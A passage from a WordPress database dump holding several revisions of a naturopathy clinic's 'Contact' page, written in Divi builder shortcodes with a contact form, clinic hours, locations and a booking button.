button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"text-decoration: underline;\"><em><span style=\"font-family: Montserrat; color: #666666; text-decoration: underline;\">Mundaring</span></em></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 8.15am-12.45pm</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<h3><span style=\"text-decoration: underline;\"><em><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666; text-decoration: underline;\">Kalamunda</span></span></em></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 2-5pm </span></span><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Wed/Thurs: 9am-5pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">(Online consults available anytime)</span></span><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"> Mundaring Wellness Centre (16 Craig st, Mundaring)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-06-15 12:56:29','2021-06-15 04:56:29','',26,'https://verdenaturopathy.com.au/?p=331',0,'revision','',0),(378,1,'2022-01-21 12:23:10','2022-01-21 04:23:10','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9-6pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available any of the above times</span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2022-01-21 12:23:10','2022-01-21 04:23:10','',26,'https://verdenaturopathy.com.au/?p=378',0,'revision','',0),(330,1,'2021-06-15 12:55:36','2021-06-15 04:55:36','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">) hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: 